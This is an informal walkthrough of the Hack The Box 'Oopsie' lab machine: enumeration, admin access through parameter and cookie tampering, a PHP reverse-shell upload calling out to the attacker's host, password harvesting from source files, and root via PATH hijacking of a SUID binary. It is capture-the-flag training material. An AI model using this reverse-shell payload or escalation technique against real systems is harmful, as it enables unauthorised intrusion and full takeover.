HTB-oopsie

Oopsie htb machine

Target machine enumeration

nmap -sC -sV -vv -oA 1 10.129.183.20

i got two ports open 80 and 22

i visited the http://10.129.183.20 and normal page appeared !! and i tried to analyze the source codes ! , not effectively !! :)

i got something suspicious there !!

/cdn-cgi/login/script.js

i apprached the login pannel i.e

/cdn-cgi/login/

see i started to logged in and captured the req in burp and i saw the response of the request !!

as you can see above i saw the param i.e guess=true i tried that and i was redirecting to admin.php

as you willl always go through this website on your target ip , you will have to get familiar for finding the small bugs , as i did , see i captured the req and saw the reponse but i instantly gone to the source code on target ip and seen carefullly !!

it requires super admin privilages ——> i was like yeah this shold be noted then i moved to the other optoins like account ;)

<http://10.129.192.110/cdn-cgi/login/admin.php?content=accounts&id=2>

i got this usl i tried to do id=1 and i got admin acess id , at this point i was thinking like i have forgotten something , at the time i captured the rep i didnt looked into the req carefully !!

i got acess id there that i missed to lookout earlier and then i just maked the 3422 i.e admin acess id and role to admin !!

and it was sucess !!

but yeah at this was login page it still returned me a login pannel and leaved this and moved on to the source code there i got any urls

but this was nothing for me at the time like i already founded it and gone to uplaods and it required the admin priv so i just changed the role and acess id to admin and 34322 and then i got option for uploading the file !!!

2> GAINING FOOTHOLD

for foothold i just gone through cmds notes and copied a php revershell payload and started a listner too

so all this things for foothold i have been into the burp ,

i refreshed the page and captured the req of the url below;

<http://10.129.192.110/cdn-cgi/login/admin.php?content=uploads>

<?php system('/bin/bash -c "bash -i >& /dev/tcp/10.10.16.7/4444 0>&1"'); ?>

i started the listener after sending the above payload as the shell.php , see i tried multiple times but i didnt get the trigger like the mistake was i was triggering this into wrong like

<http://ipadress/cdn-cgi/login/uploads/shell.php>
<http://ipadress/cdn-cgi/uploads/shell.php>

but this was wrong !!

i stared directory enumeration with totally upset mood , till that i was roaming for shell acess because to trigger the revere shell i have to make it trigger throught the proper path !!

/images               (Status: 301) [Size: 315] [--> <http://10.129.183.20/images/>]
/css                  (Status: 301) [Size: 312] [--> <http://10.129.183.20/css/>]
/js                   (Status: 301) [Size: 311] [--> <http://10.129.183.20/js/>]
/themes               (Status: 301) [Size: 315] [--> <http://10.129.183.20/themes/>]
/uploads              (Status: 301) [Size: 316] [--> <http://10.129.183.20/uploads/>]

i gone to the path

<http://10.129.183.20/uploads/shell.php>

boom , i got reverse shell on 4444 which i started nc -lvnp 4444

www-data@oopsie:/var/www/html/uploads$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@oopsie:/var/www/html/uploads$ sudo -l
sudo -l
sudo: no tty present and no askpass program specified
www-data@oopsie:/var/www/html/uploads$ ls
ls
shel.php
www-data@oopsie:/var/www/html/uploads$ cd .
.ccd .
www-data@oopsie:/var/www/html/uploads$ cd ..
.ccd ..

Command '.ccd' not found, did you mean:

  command 'cccd' from deb cccd

Try: apt install <deb name>

www-data@oopsie:/var/www/html/uploads$ cd ..
cd ..
www-data@oopsie:/var/www/html$ cd ..
cd ..
www-data@oopsie:/var/www$ cd ..
cd ..
www-data@oopsie:/var$ cd ..
cd ..
www-data@oopsie:/$ ls
ls
bin
boot
cdrom
dev
etc
home
initrd.img
initrd.img.old
lib
lib64
lost+found
media
mnt
opt
proc
root
run
sbin
snap
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
www-data@oopsie:/$ cd /home
cd /home
www-data@oopsie:/home$ ls
ls
robert
www-data@oopsie:/home$ cd robert
cd robert
www-data@oopsie:/home/robert$ ls
ls
user.txt
www-data@oopsie:/home/robert$ cat user.txt
cat user.txt
f2c74ee8db7983851ab2a96a44eb7981

so this was what i had done there , see i am posting here what i have done , because i am lazy and i dont want to edit anything at all ,

so i got user.txt

3> privilage esclation

i am not good at priv esc like i am always like i have to think harder and harder so i just tried the commands

www-data@oopsie:/home/robert$ find / -perm -4000 -type f 2>/dev/null

as you can see i got a intresting thing bugtracker , idk anything about it,

strings /usr/bin/bugtracker | less

i use above cmd and got nothing intresting !! this was my thinking when i used this cmd and just scrolled down faslt no analysis like deep one !!

but yeah i got something there !!

---

so this was my thinkgin going on , and i leaved it later like i didnt knwo anythin and i started to use that and i got permission denied and followed the directory i.e

/var/www/html/cdn-cgi/login

see this looks easy but trust me it was too hard for me to go raoming this side for php files and i got some password

www-data@oopsie:/var/www/html/cdn-cgi/login$ cat * | grep -i pass
cat * | grep -i pass
if($_POST["username"]==="admin" && $_POST["password"]==="MEGACORP_4dm1n!!")
<input type="password" name="password" placeholder="Password" />
www-data@oopsie:/var/www/html/cdn-cgi/login$ su robert
su robert
su: must be run from a terminal
www-data@oopsie:/var/www/html/cdn-cgi/login$ python3 -c 'import pty; pty.spawn("/bin/bash")'
<in$ python3 -c 'import pty; pty.spawn("/bin/bash")'

i setuped putty for interactive shell and yeahh i got admin and pass MEGACORP_4dm1n!!

and i runned on my terminal su

so su to robert ;

su robert 
pass=M3g4C0rpUs3r!

now the real game begainns for me !!!

robert@oopsie:/var/www/html/cdn-cgi/login$ ls -la /usr/bin/bugtracker
-rwsr-xr-- 1 root bugtracker 8792 Jan 25  2020 /usr/bin/bugtracker
robert@oopsie:/var/www/html/cdn-cgi/login$ ^C
robert@oopsie:/var/www/html/cdn-cgi/login$ cat etc/passwd
cat: etc/passwd: No such file or directory
robert@oopsie:/var/www/html/cdn-cgi/login$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
robert@oopsie:/var/www/html/cdn-cgi/login$ ls -la /etc/cron.hourly/
total 12
drwxr-xr-x  2 root root 4096 Aug  5  2019 .
drwxr-xr-x 97 root root 4096 Oct 11  2021 ..
-rw-r--r--  1 root root  102 Nov 16  2017 .placeholder

as you can see this was the **it i was doing here !! idk what i was doing but i was geeting something like

17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly

i was going deeper and i got nothing there !!!

robert@oopsie:/var/www/html/cdn-cgi/login$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
robert:x:1000:1000:robert:/home/robert:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false

i tried to go for /etc/passwd to find the active users there and only robert was present there

same alternative i tried to do ssh like we had admin crdentials but no luck there !!

see i started to look into the bug tracker as i confirmed that i was in the bugtrackers grp so i can execute it !!

robert@oopsie:/var/www/html/cdn-cgi/login$ /usr/bin/bugtracker

------------------
: EV Bug Tracker :
------------------

Provide Bug ID: 123; bash -p
---------------

cat: /root/reports/123: No such file or directory

so a catch is there see , cat: /root/reports/123

so catch is like the tool or like service or whatever bugtracker coudnt find the cat ,

for example , for running the cat command in the linux first liunux goes throught the file cat and then run the cat !!

just do following

echo $PATH
it might say ; -->
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
so , Linux checks those folders in order to find the first file called cat;

If we make our own file called cat, and put it in a directory that comes before /bin in the $PATH, it gets used instead of the real cat

so ,

echo "/bin/bash" > /tmp/cat
chmod +x /tmp/cat
export PATH=/tmp:$PATH

now , bugtracker runs the cat and the linux finds the /tmp/cat first i.e before bin

and the file does is /bin/bash

offcourse it started a new shell !!!

as bugtraker is already root so it provides a root shell !!

here i used less command to get root !!

CATCH—→

see , the bugtracker runs following

system("cat /root/reports/12");

if bugtracer runs this

system("/bin/cat /root/reports/12");

which was like boom no efforts then it could have worked !!

but in out situation its like kali linux have to find the path for the cat /root/reports ///….. to run

so key point is its just “cat” written there

and linux finds the cat like this ;)

echo $PATH
# /tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

so , what happened with our tricked path hijack is ;

1> linux gone to /tmp/cat

2> and provide a shell

3> it never reached the /bin/cat

i am soory its bit confusing , i am new to building writeupps i tried this to understand to you as well as me as for my notes i am making this writeupps !!!

hope the catch concept should be cleared !!!

connect with me here ;) https://www.linkedin.com/in/ashutosh-0xash-munde-%F0%9F%87%AE%F0%9F%87%B3-760138262/

https://x.com/6173687561646d6

its really a nice machine !!!